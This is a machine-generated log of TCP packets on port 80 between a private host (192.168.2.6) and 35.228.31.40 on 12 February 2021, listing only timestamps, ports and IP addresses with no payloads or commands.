Feb 12, 2021 10:00:41.165903091 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.165930986 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.167794943 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.167821884 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.167836905 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.167855024 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.167870998 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.167886972 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.167901039 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.167907000 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.167927027 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.167934895 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.167947054 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.167958021 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.167964935 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.167983055 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.167990923 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.167999983 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.168050051 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.168081999 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.168486118 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.168571949 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.171103954 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.171129942 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.171154022 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.171169043 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.171181917 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.171217918 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.171256065 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.173075914 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.173171043 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.204262972 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.204372883 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.208056927 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.208084106 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.208100080 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.208117008 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.208133936 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.208159924 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.208164930 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.208179951 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.208183050 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.208197117 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.208209991 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.208221912 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.208234072 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.208246946 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.208246946 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.208348036 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.213495016 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.213521957 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.213537931 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.213555098 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.213572025 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.213587046 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.213615894 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.213670015 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.243422031 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.243530989 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.248290062 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.248316050 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.248336077 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.248354912 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.248366117 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.248372078 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.248389006 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.248390913 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.248409986 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.248424053 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.248430014 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.248442888 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.248447895 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.248465061 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.248478889 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.248488903 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.248492002 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.248533010 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.248547077 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.248732090 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.248789072 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.253904104 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.253931046 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.253947020 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.253963947 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.253983974 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.253983021 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.254002094 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.254008055 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.254050970 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.254067898 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.281910896 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.282000065 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.291368961 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.291398048 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.291415930 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.291428089 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.291440964 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.291454077 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.291466951 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.291471004 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.291481018 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.291493893 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.291506052 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.291517973 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.291529894 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.291563034 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.291614056 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.294084072 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.294110060 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.294127941 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.294143915 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.294164896 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.294166088 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.294186115 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.294203043 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.294213057 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.294220924 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.294244051 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.294248104 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.294255972 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.294271946 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.294274092 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.294305086 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.294334888 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.296169996 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.296224117 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.323630095 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.323736906 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.331885099 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.331914902 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.331931114 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.331948042 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.331964016 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.331979990 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.331981897 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.332072973 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.333168030 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.333239079 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.334023952 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.334049940 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.334064960 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.334079027 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.334095955 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.334099054 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.334114075 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.334131956 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.334144115 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.334146976 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.334175110 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.334270954 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.334366083 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.334387064 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.334403038 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.334415913 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.334458113 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.336422920 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.336502075 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.362273932 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.362358093 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.369360924 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.369410992 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.369429111 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.369446039 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.369457960 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.369471073 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.369489908 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.369522095 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.369595051 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.369606972 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.371094942 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.371284962 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.374033928 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.374059916 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.374077082 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.374094009 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.374097109 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.374109983 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.374128103 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.374145031 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.374145031 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.374166012 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.374172926 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.374186039 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.374202967 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.374203920 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.374222994 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.374237061 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.374257088 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.374274015 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.374275923 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.374291897 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.374305964 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.374310970 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.374352932 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.374385118 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.392312050 CET	49755	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.453052998 CET	49754	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.473442078 CET	80	49755	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.541647911 CET	80	49754	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.544004917 CET	49754	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.544053078 CET	49754	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.585432053 CET	49756	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.585504055 CET	49757	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.623615980 CET	80	49754	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.665533066 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.665577888 CET	80	49756	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:41.665640116 CET	49757	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.665712118 CET	49756	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.666625977 CET	49757	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:41.786366940 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.103462934 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.103524923 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.103573084 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.103575945 CET	49757	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:42.103607893 CET	49757	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:42.103630066 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.103645086 CET	49757	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:42.103672028 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.103712082 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.103734970 CET	49757	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:42.103810072 CET	49757	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:42.143819094 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.143846989 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.143862963 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.143876076 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.143987894 CET	49757	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:42.184185028 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.184215069 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.184231043 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.184248924 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.184264898 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.184281111 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.184288979 CET	49757	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:42.184298038 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.184314966 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.184329987 CET	49757	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:42.184334993 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.184353113 CET	49757	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:42.184354067 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.184370041 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.184387922 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.184391022 CET	49757	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:42.184427023 CET	49757	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:42.184443951 CET	49757	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:42.224011898 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.224057913 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.224087000 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.224114895 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.224142075 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.224169970 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.224196911 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.224226952 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.224261045 CET	49757	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:42.224323988 CET	49757	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:42.262252092 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.262294054 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.262316942 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.262337923 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.262358904 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.262381077 CET	49757	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:42.262386084 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.262407064 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.262408018 CET	49757	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:42.262428999 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.262448072 CET	49757	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:42.262454987 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.262475014 CET	49757	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:42.262478113 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.262500048 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.262506008 CET	49757	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:42.262521029 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.262531042 CET	49757	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:42.262542963 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.262551069 CET	49757	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:42.262558937 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.262573957 CET	49757	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:42.262595892 CET	49757	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:42.262617111 CET	49757	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:42.266287088 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.266319036 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.266341925 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.266371012 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.266370058 CET	49757	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:42.266391993 CET	49757	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:42.266395092 CET	49757	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:42.266396046 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.266417027 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.266427994 CET	49757	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:42.266439915 CET	49757	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:42.266441107 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.266462088 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.266469955 CET	49757	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:42.266484022 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.266499043 CET	49757	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:42.266508102 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.266522884 CET	49757	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:42.266544104 CET	49757	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:42.266567945 CET	49757	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:42.302248955 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.302284002 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.302299976 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.302316904 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.302333117 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.302349091 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.302366018 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.302377939 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.302396059 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.302447081 CET	49757	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:42.302484989 CET	49757	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:42.302491903 CET	49757	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:42.340460062 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.340495110 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.340516090 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.340531111 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.340543985 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.340555906 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.340574026 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.340591908 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.340609074 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.340630054 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.340647936 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.340665102 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.340677023 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.340684891 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.340718985 CET	49757	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:42.340759039 CET	49757	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:42.340858936 CET	49757	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:42.347189903 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.347222090 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.347237110 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.347259045 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.347279072 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.347296000 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.347315073 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.347322941 CET	49757	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:42.347328901 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.347343922 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.347351074 CET	49757	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:42.347358942 CET	49757	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:42.347361088 CET	80	49757	35.228.31.40	192.168.2.6
